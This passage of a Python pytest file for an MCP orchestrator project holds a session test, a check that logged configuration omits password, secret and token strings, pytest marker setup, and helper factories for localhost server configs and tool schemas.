active_session = await orchestrator.session_manager.get_session(session2.session_id) |
|
|
assert active_session is not None |
|
|
|
|
|
def test_configuration_sensitivity(self): |
|
|
"""Test that sensitive configuration is handled properly.""" |
|
|
config_manager = ConfigManager() |
|
|
|
|
|
|
|
|
with patch('structlog.get_logger') as mock_logger: |
|
|
config_manager.load_from_env() |
|
|
|
|
|
|
|
|
for call in mock_logger.return_value.info.call_args_list: |
|
|
args = call[0] |
|
|
if len(args) > 0: |
|
|
|
|
|
assert 'password' not in str(args).lower() |
|
|
assert 'secret' not in str(args).lower() |
|
|
assert 'token' not in str(args).lower() |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def pytest_configure(config): |
|
|
"""Configure pytest with custom markers.""" |
|
|
config.addinivalue_line( |
|
|
"markers", "slow: marks tests as slow (deselect with '-m \"not slow\"')" |
|
|
) |
|
|
config.addinivalue_line( |
|
|
"markers", "integration: marks tests as integration tests" |
|
|
) |
|
|
config.addinivalue_line( |
|
|
"markers", "performance: marks tests as performance tests" |
|
|
) |
|
|
|
|
|
|
|
|
def pytest_collection_modifyitems(config, items): |
|
|
"""Automatically mark tests.""" |
|
|
for item in items: |
|
|
|
|
|
if "test_orchestrator_integration" in item.nodeid: |
|
|
item.add_marker(pytest.mark.integration) |
|
|
|
|
|
|
|
|
if "test_performance" in item.nodeid: |
|
|
item.add_marker(pytest.mark.performance) |
|
|
|
|
|
|
|
|
if "slow" in item.keywords or any("slow" in str(mark) for mark in item.iter_markers()): |
|
|
item.add_marker(pytest.mark.slow) |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def create_test_server_config(server_id: str = "test") -> ServerConfig: |
|
|
"""Create a test server configuration.""" |
|
|
return ServerConfig( |
|
|
id=server_id, |
|
|
name=f"Test {server_id.title()} Server", |
|
|
url=f"http://localhost:{8000 + hash(server_id) % 1000}", |
|
|
auth_token=f"token_{server_id}", |
|
|
timeout=30, |
|
|
max_retries=3, |
|
|
max_connections=10 |
|
|
) |
|
|
|
|
|
|
|
|
def create_test_tool_schema(tool_name: str = "test_tool") -> Dict[str, Any]: |
|
|
"""Create a test tool schema.""" |
|
|
return { |
|
|
"name": tool_name, |
|
|
"description": f"Test tool {tool_name}", |
|
|
"input_schema": { |
|
|
"type": "object", |
|
|
"properties": { |
|
|
"message": { |
|
|
"type": "string", |
|
|
"description": "Message to process", |
|
|
"minLength": 1, |
|
|
"maxLength": 1000 |
|
|
}, |
|
|
"priority": { |
|
|
"type": "integer", |
|
|
"description": "Priority level", |
|
|
"minimum": 1, |
|
|
"maximum": 10, |
|
|
"default": 5 |
|
|
} |
|
|
}, |
|
|
"required": ["message"] |
|
|
}, |
|
|
"examples": [ |
|
|
{"message": "Hello, world!", "priority": 1}, |
|
|
{"message": "Important task", "priority": 8} |
|
|
], |
|
|
"tags": ["test", "utility"], |
|
|
"version": "1.0.0" |
|
|
} |
|
|
|
|
|
|
|
|
async def wait_for_condition(condition_func, timeout: float = 5.0, interval: float = 0.1): |
|
|
"""Wait for a condition to become true.""" |
|
|
start_time = time.time() |
|
|
while time.time() - start_time < timeout: |
|
|
if await condition_func() if asyncio.iscoroutinefunction(condition_func) else condition_func(): |
|
|
return True |
|
|
await asyncio.sleep(interval) |
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
|
|
|
pytest.main([ |
|
|
__file__, |
|
|
"--cov=mcp_orchestrator", |
|
|
"--cov=secrets_manager", |
|
|
"--cov=gradio_interface", |
|
|
"--cov-report=html", |
|
|
"--cov-report=term", |
|
|
"-v" |
|
|
]) |